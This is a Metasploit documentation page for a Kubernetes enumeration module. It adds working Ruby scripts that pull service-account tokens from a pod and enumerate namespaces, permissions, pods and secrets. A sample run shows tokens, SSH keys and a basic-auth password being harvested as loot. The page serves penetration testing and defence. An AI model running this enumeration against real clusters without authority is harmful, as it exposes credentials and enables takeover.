Kubernetes Enumeration - Metasploit


This page contains detailed information about how to use the auxiliary/cloud/kubernetes/enum_kubernetes Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Kubernetes Enumeration
Module: auxiliary/cloud/kubernetes/enum_kubernetes
Source code: modules/auxiliary/cloud/kubernetes/enum_kubernetes.rb
Disclosure date: -
Last modification time: 2021-10-07 12:35:53 +0000
Supported architecture(s): -
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Enumerate a Kubernetes API to report useful resources such as available namespaces, pods, secrets, etc. Useful resources will be highlighted using the HIGHLIGHT_NAME_PATTERN option.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


msf > use auxiliary/cloud/kubernetes/enum_kubernetes
msf auxiliary(enum_kubernetes) > show options
    ... show and set options ...
msf auxiliary(enum_kubernetes) > run

This is an auxiliary module, so it has no targets: there is nothing to set with TARGET, and run (for which exploit is an accepted alias) starts the enumeration.

Knowledge Base


Vulnerable Application


Description

Enumerates a Kubernetes cluster through its API server: the namespaces visible to the supplied token, the permissions that token holds in each namespace, and the pods and secrets in each namespace. Credential-bearing secrets (service-account tokens, basic-auth, SSH keys, TLS keys and certificates, registry credentials) are decoded and stored as loot.

Verification Steps


Create or acquire the credentials (a bearer token for the API server, or a session on a pod that has a service-account token mounted).

  1. Start msfconsole
  2. Do: use auxiliary/cloud/kubernetes/enum_kubernetes
  3. Set the required options
  4. Do: run
  5. You should see the enumerated resources from the Kubernetes API.

Options


SESSION

An optional session to use for configuration. When specified, the values of NAMESPACE, TOKEN, RHOSTS and RPORT will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary values may not always be present, for example when the pod's service account token is not mounted into the container.

Setting this option will also automatically route connections through the specified session.
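The values the SESSION option collects from a pod live in well-known places: the service-account token, its namespace and the cluster CA are mounted under /var/run/secrets/kubernetes.io/serviceaccount, and the API server address is exposed through the KUBERNETES_SERVICE_HOST and KUBERNETES_SERVICE_PORT environment variables. The routine below is an added example, not the module's own code; it runs locally rather than through a Metasploit session, the function and constant names are the author's own, and the fake pod it builds (token, namespace, CA file and environment) is constructed data.

```ruby
require 'fileutils'
require 'tmpdir'

# Added example, not the module's code: the values the SESSION option pulls
# from a compromised pod, read from the places Kubernetes puts them.
# Path and env var names are the Kubernetes defaults; `root:` and `env:` are
# parameters only so the routine can be exercised against a fake pod below.
SA_DIR = 'var/run/secrets/kubernetes.io/serviceaccount'.freeze

def discover_in_pod_config(env: ENV, root: '/')
  read = lambda do |file|
    path = File.join(root, SA_DIR, file)
    File.file?(path) ? File.read(path).strip : nil # nil when the token is not mounted
  end
  host = env['KUBERNETES_SERVICE_HOST']
  port = env['KUBERNETES_SERVICE_PORT_HTTPS'] || env['KUBERNETES_SERVICE_PORT']
  {
    rhost: host, rport: port&.to_i,
    url: host && port ? "https://#{host}:#{port}" : nil, # in-cluster API endpoint, always TLS
    token: read.call('token'),         # service-account JWT (the module's TOKEN)
    namespace: read.call('namespace'), # the module's NAMESPACE
    ca_cert: read.call('ca.crt')       # cluster CA: lets you verify the API server instead of skipping TLS checks
  }
end

# Options that would still have to be set by hand: automountServiceAccountToken: false,
# or a container started without the in-cluster env vars, leaves some of these empty.
def missing_config(cfg)
  %i[url token namespace].reject { |k| cfg[k] }
end

# Constructed fake pod filesystem and environment, so the discovery runs offline.
def demo_fake_pod
  Dir.mktmpdir do |root|
    dir = File.join(root, SA_DIR)
    FileUtils.mkdir_p(dir)
    files = { 'token' => 'eyJhbGciO.placeholder', 'namespace' => 'default',
              'ca.crt' => "-----BEGIN CERTIFICATE-----\n..." }
    files.each { |file, body| File.write(File.join(dir, file), body) }
    discover_in_pod_config(env: { 'KUBERNETES_SERVICE_HOST' => '10.96.0.1', 'KUBERNETES_SERVICE_PORT' => '443' },
                           root: root)
  end
end

if $PROGRAM_NAME == __FILE__
  # `ruby discover.rb --real` inside a pod; without the flag it uses the fake pod
  cfg = ARGV[0] == '--real' ? discover_in_pod_config : demo_fake_pod
  cfg.each { |k, v| puts "#{k}: #{v.nil? ? '(missing)' : v.to_s.lines.first.strip}" }
  puts "set by hand: #{missing_config(cfg).join(', ')}" unless missing_config(cfg).empty?
end
```

Anything reported as missing is what you would then supply manually with set TOKEN, set NAMESPACE or set RHOSTS.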

TOKEN

The JWT bearer token presented to the API server. For this module it needs permission to list the resources being enumerated (namespaces, pods, secrets); for any resource the token may not list, the corresponding section cannot be enumerated.

POD

The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run forever. After creation, the pod will be used to execute the payload. The created pod is not automatically cleaned up. A note containing the created pod's information will be added to the database when it is connected.

NAMESPACE

The Kubernetes namespace to enumerate. Leave it unset to enumerate every namespace the TOKEN can see, as in the scenario below.

NAMESPACE_LIST

The default namespace list to iterate when the current token does not have permission to list the available namespaces; each name in the list is then enumerated individually.

HIGHLIGHT_NAME_PATTERN

A PCRE regex; resources whose names match it are highlighted in the output so that interesting items (credentials, keys, tokens) stand out.

OUTPUT

Output format, allowed values are: table, json
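Taken together, the options above describe one flow: list namespaces (or fall back to NAMESPACE_LIST when the API server refuses), ask the API server what the token may do in each namespace, then list pods and secrets where that is allowed and flag names matching HIGHLIGHT_NAME_PATTERN. The script below is an added example that reproduces that flow in plain Ruby; it is not the module's code. The API paths and the SelfSubjectRulesReview object are standard Kubernetes, but the class and function names, the particular NAMESPACE_LIST default, and the canned responses in FakeClient (a token that may list pods and secrets in "default" only, and may not list namespaces) are assumptions made for the example so that it runs offline.

```ruby
require 'json'
require 'net/http'
require 'openssl'
require 'uri'

# Added example, not the module's code: the enumeration flow the module runs
# (namespaces -> per-namespace SelfSubjectRulesReview -> pods -> secrets).
# Transport and logic are separate so the logic can run offline (FakeClient below).
class K8sClient
  # verify_peer: false mirrors a pentest against a self-signed API server.
  def initialize(base_url, token, verify_peer: false)
    @base, @token, @verify_peer = URI(base_url), token, verify_peer
  end

  # Returns [http_status, parsed_json]; a non-JSON body becomes {}.
  def request(method, path, body = nil)
    http = Net::HTTP.new(@base.host, @base.port)
    http.use_ssl = (@base.scheme == 'https')
    http.verify_mode = @verify_peer ? OpenSSL::SSL::VERIFY_PEER : OpenSSL::SSL::VERIFY_NONE
    req = (method == :post ? Net::HTTP::Post : Net::HTTP::Get).new(path)
    req['Authorization'] = "Bearer #{@token}"
    req['Content-Type'] = 'application/json'
    req.body = JSON.dump(body) if body
    res = http.request(req)
    [res.code.to_i, (JSON.parse(res.body) rescue {})]
  end
end

# Fallback when the token may not list namespaces (the module's NAMESPACE_LIST
# option; this default list is an assumption made for the example).
NAMESPACE_LIST = %w[default kube-system kube-public kube-node-lease].freeze

def namespaces(client, namespace: nil, fallback: NAMESPACE_LIST)
  return [namespace] if namespace
  code, body = client.request(:get, '/api/v1/namespaces')
  return body['items'].map { |ns| ns.dig('metadata', 'name') } if code == 200
  fallback # usually 403: authenticated but not allowed to list, so try each blindly
end

# SelfSubjectRulesReview answers "what may *this* token do in namespace ns";
# the API server replies 201 Created with the rules in .status.
def auth_rules(client, ns)
  review = { 'apiVersion' => 'authorization.k8s.io/v1', 'kind' => 'SelfSubjectRulesReview',
             'spec' => { 'namespace' => ns } }
  code, body = client.request(:post, '/apis/authorization.k8s.io/v1/selfsubjectrulesreviews', review)
  code == 201 ? (body.dig('status', 'resourceRules') || []) : []
end

# '*' is a wildcard in both columns (the "*.* ... [*]" rows in the module output mean cluster-admin)
def allowed?(rules, resource, verb)
  rules.any? { |r| ((r['resources'] || []) & ['*', resource]).any? && ((r['verbs'] || []) & ['*', verb]).any? }
end

def list(client, ns, resource)
  code, body = client.request(:get, "/api/v1/namespaces/#{ns}/#{resource}")
  code == 200 ? body['items'] : []
end

# Per-namespace summary; names matching `highlight` are flagged like HIGHLIGHT_NAME_PATTERN does.
def enumerate(client, namespace: nil, highlight: /user|pass|token|key/i)
  namespaces(client, namespace: namespace).map do |ns|
    rules = auth_rules(client, ns)
    pods = allowed?(rules, 'pods', 'list') ? list(client, ns, 'pods') : []
    secrets = allowed?(rules, 'secrets', 'list') ? list(client, ns, 'secrets') : []
    pod_rows = pods.map do |p|
      { name: p.dig('metadata', 'name'), status: p.dig('status', 'phase'),
        images: p.dig('spec', 'containers').map { |c| c['image'] } }
    end
    secret_rows = secrets.map do |s|
      name = s.dig('metadata', 'name')
      { name: name, type: s['type'], highlight: name.match?(highlight) }
    end
    { namespace: ns, pods: pod_rows, secrets: secret_rows }
  end
end

# Constructed responses, not a real cluster: the token may list pods and secrets
# in "default" only and may not list namespaces at all.
class FakeClient
  POD = { 'metadata' => { 'name' => 'redis-7fd956df5-sbchb' }, 'status' => { 'phase' => 'Running' },
          'spec' => { 'containers' => [{ 'name' => 'redis', 'image' => 'redis:5.0.4' }] } }.freeze
  SECRETS = [{ 'metadata' => { 'name' => 'db-password' }, 'type' => 'Opaque' },
             { 'metadata' => { 'name' => 'secret-tls' }, 'type' => 'kubernetes.io/tls' }].freeze

  def request(method, path, body = nil)
    if method == :post # the rules review
      rules = body.dig('spec', 'namespace') == 'default' ? [{ 'resources' => %w[pods secrets], 'verbs' => %w[get list] }] : []
      return [201, { 'status' => { 'resourceRules' => rules } }]
    end
    case path
    when '/api/v1/namespaces/default/pods' then [200, { 'items' => [POD] }]
    when '/api/v1/namespaces/default/secrets' then [200, { 'items' => SECRETS }]
    else [403, { 'kind' => 'Status', 'code' => 403 }]
    end
  end
end

if $PROGRAM_NAME == __FILE__ # ruby enum.rb https://api.example:6443 <token>; no args = offline FakeClient
  client = ARGV.size == 2 ? K8sClient.new(ARGV[0], ARGV[1]) : FakeClient.new
  enumerate(client).each { |row| puts JSON.pretty_generate(row) }
end
```

Checking permissions with SelfSubjectRulesReview before listing is what keeps a low-privilege token from producing a wall of 403s, and it is also why the module can print an Auth table even for namespaces where it finds nothing else.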

Scenarios


Run all enumeration

Explicitly setting RHOST and TOKEN, with NAMESPACE left blank, to enumerate all available namespaces and their associated resources. The token used in this run is effectively cluster-admin (note the *.* resources row with verb * in every Auth table), which is why each pod and secret is listed and every service-account token is saved to loot:

msf6 > use cloud/kubernetes/enum_kubernetes
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set RHOST https://kubernetes.docker.internal:6443
RHOST => https://kubernetes.docker.internal:6443
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > set TOKEN eyJhbGciO...
TOKEN => eyJhbGciO...
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > run
[*] Running module against 127.0.0.1

[+] Kubernetes service version: {"major":"1","minor":"21","gitVersion":"v1.21.2","gitCommit":"092fbfbf53427de67cac1e9fa54aaa09a28371d7","gitTreeState":"clean","buildDate":"2021-06-16T12:53:14Z","goVersion":"go1.16.5","compiler":"gc","platform":"linux/amd64"}
[+] Enumerating namespaces
Namespaces
==========

  #  name
  -  ----
  0  default
  1  kube-node-lease
  2  kube-public
  3  kube-system
  4  kubernetes-dashboard

[+] Namespace 0: default
Auth (namespace: default)
=========================

  Resources                                      Non-Resource URLs                    Resource Names  Verbs
  ---------                                      -----------------                    --------------  -----
  *.*                                            []                                   []              [*]
  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
                                                 [*]                                  []              [*]
                                                 [/.well-known/openid-configuration]  []              [get]
                                                 [/api/*]                             []              [get]
                                                 [/api]                               []              [get]
                                                 [/apis/*]                            []              [get]
                                                 [/apis]                              []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/livez]                             []              [get]
                                                 [/livez]                             []              [get]
                                                 [/openapi/*]                         []              [get]
                                                 [/openapi]                           []              [get]
                                                 [/openid/v1/jwks]                    []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version]                           []              [get]
                                                 [/version]                           []              [get]

Pods (namespace: default)
=========================

  #   namespace  name                       status   containers                                       ip
  -   ---------  ----                       ------   ----------                                       --
  0   default    a4bg7r                     Running  iyxz0ujfck9t (image: vulhub/thinkphp:5.0.23)     10.1.1.51
  1   default    appjokbpiiml               Running  iggapn (image: vulhub/thinkphp:5.0.23)           10.1.1.57
  2   default    cvyf4m9le                  Running  t0e93vcuyi (image: vulhub/thinkphp:5.0.23)       10.1.1.53
  3   default    fh4bfdtf                   Running  dygvv (image: vulhub/thinkphp:5.0.23)            10.1.1.52
  4   default    gavp                       Running  jfwdaei (image: vulhub/thinkphp:5.0.23)          10.1.1.58
  5   default    mkfkuwd6hkd1               Running  aoavh (image: vulhub/thinkphp:5.0.23)            10.1.1.62
  6   default    nid7jd                     Running  geb (image: vulhub/thinkphp:5.0.23)              10.1.1.45
  7   default    redis-7fd956df5-sbchb      Running  redis (image: redis:5.0.4 TCP:6379)              10.1.1.56
  8   default    thinkphp-67f7c88cc9-djg6q  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.55
  9   default    thinkphp-67f7c88cc9-l56mg  Running  thinkphp (image: vulhub/thinkphp:5.0.23 TCP:80)  10.1.1.44
  10  default    usuuucs                    Running  xfcw (image: vulhub/thinkphp:5.0.23)             10.1.1.50
  11  default    v2xxl7z                    Running  nu3s (image: vulhub/thinkphp:5.0.23)             10.1.1.61
  12  default    yulfpaohsepk               Running  jjmxkkzgkmy (image: vulhub/thinkphp:5.0.23)      10.1.1.47

Secrets (namespace: default)
============================

  #  namespace  name                                  type                                 data                    age
  -  ---------  ----                                  ----                                 ----                    ---
  0  default    default-token-btlkb                   kubernetes.io/service-account-token  ca.crt,namespace,token  8d
  1  default    local-registry                        kubernetes.io/dockerconfigjson       .dockerconfigjson       7d15h
  2  default    secret-basic-auth                     kubernetes.io/basic-auth             password,username       8d
  3  default    secret-empty                          Opaque                                                       8d
  4  default    secret-id-ed25519-with-passphrase     kubernetes.io/ssh-auth               ssh-privatekey          7d15h
  5  default    secret-id-ed25519-without-passphrase  kubernetes.io/ssh-auth               ssh-privatekey          7d15h
  6  default    secret-id-rsa-with-passphrase         kubernetes.io/ssh-auth               ssh-privatekey          8d
  7  default    secret-id-rsa-without-passphrase      kubernetes.io/ssh-auth               ssh-privatekey          8d
  8  default    secret-tls                            kubernetes.io/tls                    tls.crt,tls.key         8d

[+] service token default-token-btlkb: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_257374.bin
[+] dockerconfig json local-registry: /Users/user/.msf4/loot/20211006105714_default_unknown_docker.json_543280.bin
[+] basic_auth secret-basic-auth: admin:password213
[+] ssh_key secret-id-ed25519-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_861231.txt
[+] ssh_key secret-id-ed25519-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_095417.txt
[+] ssh_key secret-id-rsa-with-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_246326.txt
[+] ssh_key secret-id-rsa-without-passphrase: /Users/user/.msf4/loot/20211006105714_default_unknown_id_rsa_429821.txt
[+] tls_key secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.key_651137.txt
[+] tls_cert secret-tls: /Users/user/.msf4/loot/20211006105714_default_unknown_tls.cert_025932.txt (/CN=example.com)

[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================

  Resources                                      Non-Resource URLs                    Resource Names  Verbs
  ---------                                      -----------------                    --------------  -----
  *.*                                            []                                   []              [*]
  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
                                                 [*]                                  []              [*]
                                                 [/.well-known/openid-configuration]  []              [get]
                                                 [/api/*]                             []              [get]
                                                 [/api]                               []              [get]
                                                 [/apis/*]                            []              [get]
                                                 [/apis]                              []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/livez]                             []              [get]
                                                 [/livez]                             []              [get]
                                                 [/openapi/*]                         []              [get]
                                                 [/openapi]                           []              [get]
                                                 [/openid/v1/jwks]                    []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version]                           []              [get]
                                                 [/version]                           []              [get]

Pods (namespace: kube-node-lease)
=================================

  #  namespace  name  status  containers  ip
  -  ---------  ----  ------  ----------  --
  No rows

Secrets (namespace: kube-node-lease)
====================================

  #  namespace        name                 type                                 data                    age
  -  ---------        ----                 ----                                 ----                    ---
  0  kube-node-lease  default-token-54967  kubernetes.io/service-account-token  ca.crt,namespace,token  19d

[+] service token default-token-54967: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_727718.bin

[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================

  Resources                                      Non-Resource URLs                    Resource Names  Verbs
  ---------                                      -----------------                    --------------  -----
  *.*                                            []                                   []              [*]
  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
                                                 [*]                                  []              [*]
                                                 [/.well-known/openid-configuration]  []              [get]
                                                 [/api/*]                             []              [get]
                                                 [/api]                               []              [get]
                                                 [/apis/*]                            []              [get]
                                                 [/apis]                              []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/livez]                             []              [get]
                                                 [/livez]                             []              [get]
                                                 [/openapi/*]                         []              [get]
                                                 [/openapi]                           []              [get]
                                                 [/openid/v1/jwks]                    []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version]                           []              [get]
                                                 [/version]                           []              [get]

Pods (namespace: kube-public)
=============================

  #  namespace  name  status  containers  ip
  -  ---------  ----  ------  ----------  --
  No rows

Secrets (namespace: kube-public)
================================

  #  namespace    name                 type                                 data                    age
  -  ---------    ----                 ----                                 ----                    ---
  0  kube-public  default-token-2r2s4  kubernetes.io/service-account-token  ca.crt,namespace,token  19d

[+] service token default-token-2r2s4: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_198155.bin

[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================

  Resources                                      Non-Resource URLs                    Resource Names  Verbs
  ---------                                      -----------------                    --------------  -----
  *.*                                            []                                   []              [*]
  selfsubjectaccessreviews.authorization.k8s.io  []                                   []              [create]
  selfsubjectrulesreviews.authorization.k8s.io   []                                   []              [create]
                                                 [*]                                  []              [*]
                                                 [/.well-known/openid-configuration]  []              [get]
                                                 [/api/*]                             []              [get]
                                                 [/api]                               []              [get]
                                                 [/apis/*]                            []              [get]
                                                 [/apis]                              []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/healthz]                           []              [get]
                                                 [/livez]                             []              [get]
                                                 [/livez]                             []              [get]
                                                 [/openapi/*]                         []              [get]
                                                 [/openapi]                           []              [get]
                                                 [/openid/v1/jwks]                    []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/readyz]                            []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version/]                          []              [get]
                                                 [/version]                           []              [get]
                                                 [/version]                           []              [get]

Pods (namespace: kube-system)
=============================

  #  namespace    name                                    status   containers                                                                   ip
  -  ---------    ----                                    ------   ----------                                                                   --
  0  kube-system  coredns-558bd4d5db-2fspm                Running  coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153)    10.1.1.48
  1  kube-system  coredns-558bd4d5db-zx7k5                Running  coredns (image: k8s.gcr.io/coredns/coredns:v1.8.0 UDP:53,TCP:53,TCP:9153)    10.1.1.59
  2  kube-system  etcd-docker-desktop                     Running  etcd (image: k8s.gcr.io/etcd:3.4.13-0)                                       192.168.65.4
  3  kube-system  kube-apiserver-docker-desktop           Running  kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.21.2)                    192.168.65.4
  4  kube-system  kube-controller-manager-docker-desktop  Running  kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.21.2)  192.168.65.4
  5  kube-system  kube-proxy-tvgm2                        Running  kube-proxy (image: k8s.gcr.io/kube-proxy:v1.21.2)                            192.168.65.4
  6  kube-system  kube-scheduler-docker-desktop           Running  kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.21.2)                    192.168.65.4
  7  kube-system  storage-provisioner                     Running  storage-provisioner (image: docker/desktop-storage-provisioner:v2.0)         10.1.1.49
  8  kube-system  vpnkit-controller                       Running  vpnkit-controller (image: docker/desktop-vpnkit-controller:v2.0)             10.1.1.54

Secrets (namespace: kube-system)
================================

  #   namespace    name                                            type                                 data                    age
  -   ---------    ----                                            ----                                 ----                    ---
  0   kube-system  attachdetach-controller-token-4tnpl             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  1   kube-system  bootstrap-signer-token-kqgwd                    kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  2   kube-system  certificate-controller-token-g2lcs              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  3   kube-system  clusterrole-aggregation-controller-token-9kh9j  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  4   kube-system  coredns-token-xjv86                             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  5   kube-system  cronjob-controller-token-wddp5                  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  6   kube-system  daemon-set-controller-token-7w2wt               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  7   kube-system  default-token-hq24x                             kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  8   kube-system  deployment-controller-token-bf8ks               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  9   kube-system  disruption-controller-token-j4mlp               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  10  kube-system  endpoint-controller-token-sqdg2                 kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  11  kube-system  endpointslice-controller-token-wr2v9            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  12  kube-system  endpointslicemirroring-controller-token-4lqdn   kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  13  kube-system  ephemeral-volume-controller-token-67k95         kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  14  kube-system  expand-controller-token-cmfwt                   kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  15  kube-system  generic-garbage-collector-token-sxdc8           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  16  kube-system  horizontal-pod-autoscaler-token-267qc           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  17  kube-system  job-controller-token-hzv9p                      kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  18  kube-system  kube-proxy-token-cqw2h                          kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  19  kube-system  namespace-controller-token-cldm6                kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  20  kube-system  node-controller-token-tjtk5                     kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  21  kube-system  persistent-volume-binder-token-2n7jx            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  22  kube-system  pod-garbage-collector-token-vgzrz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  23  kube-system  pv-protection-controller-token-5jvqn            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  24  kube-system  pvc-protection-controller-token-jg5sn           kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  25  kube-system  replicaset-controller-token-zvblz               kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  26  kube-system  replication-controller-token-tcj4p              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  27  kube-system  resourcequota-controller-token-q5nsg            kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  28  kube-system  root-ca-cert-publisher-token-ghh92              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  29  kube-system  service-account-controller-token-ljxn7          kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  30  kube-system  service-controller-token-dg8ks                  kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  31  kube-system  statefulset-controller-token-dcx8k              kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  32  kube-system  storage-provisioner-token-52m2w                 kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  33  kube-system  token-cleaner-token-lc8jh                       kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  34  kube-system  ttl-after-finished-controller-token-qkv66       kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  35  kube-system  ttl-controller-token-rw6zq                      kubernetes.io/service-account-token  ca.crt,namespace,token  19d
  36  kube-system  vpnkit-controller-token-l9ljz                   kubernetes.io/service-account-token  ca.crt,namespace,token  19d

[+] service token attachdetach-controller-token-4tnpl: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_443806.bin
[+] service token bootstrap-signer-token-kqgwd: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_334381.bin
[+] service token certificate-controller-token-g2lcs: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_780446.bin
[+] service token clusterrole-aggregation-controller-token-9kh9j: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_695659.bin
[+] service token coredns-token-xjv86: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_035400.bin
[+] service token cronjob-controller-token-wddp5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_256456.bin
[+] service token daemon-set-controller-token-7w2wt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_370856.bin
[+] service token default-token-hq24x: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_167584.bin
[+] service token deployment-controller-token-bf8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_668044.bin
[+] service token disruption-controller-token-j4mlp: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_025629.bin
[+] service token endpoint-controller-token-sqdg2: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_952597.bin
[+] service token endpointslice-controller-token-wr2v9: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_454535.bin
[+] service token endpointslicemirroring-controller-token-4lqdn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_573333.bin
[+] service token ephemeral-volume-controller-token-67k95: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_791145.bin
[+] service token expand-controller-token-cmfwt: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_350984.bin
[+] service token generic-garbage-collector-token-sxdc8: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_095555.bin
[+] service token horizontal-pod-autoscaler-token-267qc: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_696872.bin
[+] service token job-controller-token-hzv9p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_709657.bin
[+] service token kube-proxy-token-cqw2h: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_148992.bin
[+] service token namespace-controller-token-cldm6: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_138901.bin
[+] service token node-controller-token-tjtk5: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_113414.bin
[+] service token persistent-volume-binder-token-2n7jx: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_154991.bin
[+] service token pod-garbage-collector-token-vgzrz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_413568.bin
[+] service token pv-protection-controller-token-5jvqn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_233791.bin
[+] service token pvc-protection-controller-token-jg5sn: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_468067.bin
[+] service token replicaset-controller-token-zvblz: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_821269.bin
[+] service token replication-controller-token-tcj4p: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_210131.bin
[+] service token resourcequota-controller-token-q5nsg: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_510682.bin
[+] service token root-ca-cert-publisher-token-ghh92: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_341707.bin
[+] service token service-account-controller-token-ljxn7: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_242421.bin
[+] service token service-controller-token-dg8ks: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_231000.bin
[+] service token statefulset-controller-token-dcx8k: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_346820.bin
[+] service token storage-provisioner-token-52m2w: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_889808.bin
[+] service token token-cleaner-token-lc8jh: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_071179.bin
[+] service token ttl-after-finished-controller-token-qkv66: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_155663.bin
[+] service token ttl-controller-token-rw6zq: /Users/user/.msf4/loot/20211006105714_default_127.0.0.1_kubernetes.token_730592.bin
